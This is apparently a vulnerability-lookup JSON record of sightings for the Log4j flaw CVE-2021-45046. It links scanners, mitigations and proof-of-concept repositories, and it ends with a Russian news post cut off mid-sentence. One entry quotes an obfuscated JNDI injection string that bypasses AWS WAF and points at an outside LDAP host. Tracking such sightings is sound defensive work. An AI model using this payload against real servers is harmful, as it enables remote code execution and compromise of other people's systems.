{"vulnerability": "CVE-2021-45046", "sightings": [{"uuid": "737b9967-36f9-400d-b01f-17ac0075eaef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/e804ed63-36a3-438d-b753-08a9c5ca89d8", "content": "", "creation_timestamp": "2021-12-22T20:43:05.000000Z"}, {"uuid": "633aba7d-de33-4c3d-9255-4b679f542428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/8bf50bb8-94dd-4004-a646-5f78db6f0b6a", "content": "", "creation_timestamp": "2022-07-13T13:02:16.000000Z"}, {"uuid": "4f91e801-aaeb-44d5-ae4f-10c9775ecf67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "ca8e149b-805e-4beb-97b2-d73b04468bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971808", "content": "", "creation_timestamp": "2024-12-24T20:34:18.933768Z"}, {"uuid": "dc28d743-114f-4f96-9572-57a15e63f011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "c678c1af-ba0f-4796-9941-28487ef2cfd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": 
"seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:41.000000Z"}, {"uuid": "b4694937-2c3c-4af7-b786-0e0d821e81ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/log4shell_scanner.rb", "content": "", "creation_timestamp": "2021-12-16T17:05:03.000000Z"}, {"uuid": "137c074c-2ad2-4c93-9d79-50e1adb3cc54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://gist.github.com/c0axial/f499717d0046678e19e2f0d43b9d4b55", "content": "", "creation_timestamp": "2025-08-14T14:03:30.000000Z"}, {"uuid": "85efc623-5bac-4ab4-886b-f1a5e1d99ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "f8a10e74-2d46-4930-8ae9-eef0279b7204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://gist.github.com/David-VTUK/6dfab9be82c272a427aef0162ae3eb31", "content": "", "creation_timestamp": "2025-05-27T11:37:39.000000Z"}, {"uuid": "1c40f2d6-e038-4cf7-9ba8-f66b3adcf6f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1109", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner", "creation_timestamp": "2021-12-16T12:56:36.000000Z"}, {"uuid": "04353259-719c-4268-8fa5-781c6f97d4a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/f3aa2676-c093-4d57-9d05-af8a1125e178", "content": "", "creation_timestamp": "2026-02-02T12:27:00.179910Z"}, {"uuid": "b815b2e2-bc75-4bd0-b806-193238065571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1115", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-scanner", "creation_timestamp": "2021-12-16T14:31:58.000000Z"}, {"uuid": "2b2b1d8e-535c-4099-871a-375475f96955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1090", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aReplicating CVE-2021-45046\nURL\uff1ahttps://github.com/tejas-nagchandi/CVE-2021-45046", "creation_timestamp": 
"2021-12-15T16:35:02.000000Z"}, {"uuid": "8228516f-614e-42d6-9b92-c02ef00e3492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/GithubRedTeam/1209", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105", "creation_timestamp": "2021-12-22T05:41:25.000000Z"}, {"uuid": "3c9b8605-ad2d-40df-82c3-f23906bbbf42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1110", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\nURL\uff1ahttps://github.com/freskimo/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T13:18:21.000000Z"}, {"uuid": "221472ff-47f5-4ae1-9f41-dd4776b1e998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:00.000000Z"}, {"uuid": "25f4e882-c312-443d-a046-eb2f7dad6ae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=700", "content": "", "creation_timestamp": "2021-12-10T04:00:00.000000Z"}, {"uuid": 
"57b08e71-b468-4ce0-aa9b-7049a7fbea29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/cKure/8423", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "creation_timestamp": "2021-12-15T18:34:13.000000Z"}, {"uuid": "886b5e68-fe6b-49d3-a1c5-232b0c26c847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1310", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExplanation of CVE-2021-45046 for classroom use\nURL\uff1ahttps://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java", "creation_timestamp": "2022-01-13T03:37:42.000000Z"}, {"uuid": "f000c12d-2fcc-4d7c-b8bc-3f2fc9348f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1165", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell_finder", "creation_timestamp": "2021-12-19T01:02:30.000000Z"}, {"uuid": "db830833-cf93-4a2c-96b3-d934d9fd4bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1139", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\nURL\uff1ahttps://github.com/Aschen/log4j-patched", "creation_timestamp": "2021-12-17T16:39:58.000000Z"}, {"uuid": "773cffd5-bdde-4e8f-b718-45fc422603d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1184", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j \u6f0f\u6d1e\u672c\u5730\u68c0\u6d4b\u811a\u672c\u3002 Scan all java processes on your host to check weather it's affected by log4j2 remote code execution(CVE-2021-45046)\nURL\uff1ahttps://github.com/lijiejie/log4j2_vul_local_scanner", "creation_timestamp": "2021-12-20T12:10:02.000000Z"}, {"uuid": "6071bc42-23ba-4a31-82e2-065dbaa1e493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1081", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j 2.15.0 Privilege Escalation -- CVE-2021-45046\nURL\uff1ahttps://github.com/cckuailong/Log4j_CVE-2021-45046", "creation_timestamp": "2021-12-15T05:50:40.000000Z"}, {"uuid": "c1a83c42-ceb1-4440-8560-8138b16ef156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": 
"https://t.me/GithubRedTeam/1197", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell-finder", "creation_timestamp": "2021-12-21T12:28:27.000000Z"}, {"uuid": "8279d69e-c3d2-4782-b85b-ddb2f98d0cae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1167", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/trickyearlobe/inspec-log4j", "creation_timestamp": "2021-12-19T05:27:09.000000Z"}, {"uuid": "c55698c1-38bb-45d1-86b8-5c573b7f2e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1166", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\nURL\uff1ahttps://github.com/TheInterception/Log4J-Simulation-Tool", "creation_timestamp": "2021-12-19T05:14:34.000000Z"}, {"uuid": "f38ae536-d08b-421b-a206-da4aaa480538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1119", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T16:59:08.000000Z"}, {"uuid": "e98b382b-17b3-48d8-bcb9-e3a5b2e5c64e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1118", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-filescan", "creation_timestamp": "2021-12-16T16:02:49.000000Z"}, {"uuid": "ab137106-b63e-42ca-85d6-6b59afc427cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1122", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/mergebase/log4j-samples", "creation_timestamp": "2021-12-16T21:04:20.000000Z"}, {"uuid": "a3562db3-b14f-43cf-87c9-3e9052971e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": 
"https://t.me/GithubRedTeam/1145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/lukepasek/log4jjndilookupremove", "creation_timestamp": "2021-12-17T20:43:16.000000Z"}, {"uuid": "8205aaa1-03f4-45ba-ac83-3bccd49a3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1147", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1acan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\nURL\uff1ahttps://github.com/DANSI/PowerShell-Log4J-Scanner", "creation_timestamp": "2021-12-18T00:56:11.000000Z"}, {"uuid": "94902364-cb22-4f2c-8970-0e93a735d251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8469", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Log4J v2.15.0 Patch Bypass\n\nRCE Log4j-scan can now discover the new patch bypass on v2.15.0 (CVE-2021-45046).\n\nBypass for AWS WAF for log4j jndi injection:\n\n${j $ {k 8s :k5:-ND }i${sd: k5:-:}ldap://mydogsbutt.c om: 13 89/o}\n\nSource: https://twitter.com/11xuxx/status/1471236310299906050", "creation_timestamp": "2021-12-23T12:07:21.000000Z"}, {"uuid": "e392b77a-46eb-467c-9728-8a069490d93e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/4d26c5b0-4bc5-443c-8641-553684788bdc", "content": 
"", "creation_timestamp": "2026-04-19T22:45:30.000000Z"}, {"uuid": "55a8ebe4-fca3-4c91-8552-796fb7b16c3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/GithubRedTeam/1262", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", "creation_timestamp": "2022-01-03T17:46:59.000000Z"}, {"uuid": "e3a0ad2c-062a-4cfb-b02c-f9da509eb4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell(CVE-2021-45046) Sandbox Signature\nURL\uff1ahttps://github.com/CaptanMoss/Log4Shell-Sandbox-Signature", "creation_timestamp": "2021-12-24T09:04:52.000000Z"}, {"uuid": "bb19f9c2-2e8c-484d-a371-e9a7e1ee6b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1236", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell(CVE-2021-45046) Sandbox Signature\nURL\uff1ahttps://github.com/CaptanMoss/Log4Shell-Sandbox-Signature", "creation_timestamp": "2021-12-26T19:38:10.000000Z"}, {"uuid": "23078f22-091b-4180-862c-eeffeecb166a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1309", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExplanation of CVE-2021-45046 for classroom use\nURL\uff1ahttps://github.com/taise-hub/log4j-poc", "creation_timestamp": "2022-01-13T03:08:04.000000Z"}, {"uuid": "628b769c-9ea6-46ec-9a3f-4e0c879f2911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/pesni_rogozina/16967", "content": "\u200b\u200b\u0415\u0449\u0435 \u0440\u0430\u0437\nMerry Christmas! \n Log4shell \u0432\u0441\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0442\u0441\u0442\u0443\u043f\u0438\u0442. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440, \u043a\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u0438\u043d\u043d\u0430\u044f \u044d\u043f\u043e\u043f\u0435\u044f \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 0-day \u0432\nlog4j, \u0434\u043b\u044f \u043c\u043d\u043e\u0433\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f 2. 16 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0438\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438. 
\u041d\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u043e\u043d\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0431\u0430\u0433\u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u0432\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432\u0435\u0440\u0441\u0438\u0438 2. 17. 0. \n \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u041f\u041e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430\n\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (\nDoS), \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2021-45105. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a 2. 15. 0 \u0431\u044b\u043b \u043f\u0440\u0438\u0437\u043d\u0430\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nDoS (CVE-2021-45046). 
\u041f\u043e\u0437\u0436\u0435 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u0431\u044b\u043b \u043f\u043e\u0432\u044b\u0448\u0435\u043d\nApache \u0441 \u043d\u0438\u0437\u043a\u043e\u0433\u043e (3,7) \u0434\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e (9,0) \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u0445\u043e\u0434\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u043a\u0440\u0430\u0441\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \n \u041f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0451\u0445 \u0434\u043d\u0435\u0439\nApache \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b \u043d\u043e\u0432\u0443\u044e CVE \u0438\n\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u043f\u0435\u0447\u0435\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e log4j 2. 17. 0. \n CVE-2021-45105 \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439 \u00ab\u0432\u044b\u0441\u043e\u043a\u0438\u0439\u00bb (7,5) \u0431\u0430\u043b\u043b \u043f\u043e \u0448\u043a\u0430\u043b\u0435\nCVSS, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443\nlog4j 2. 
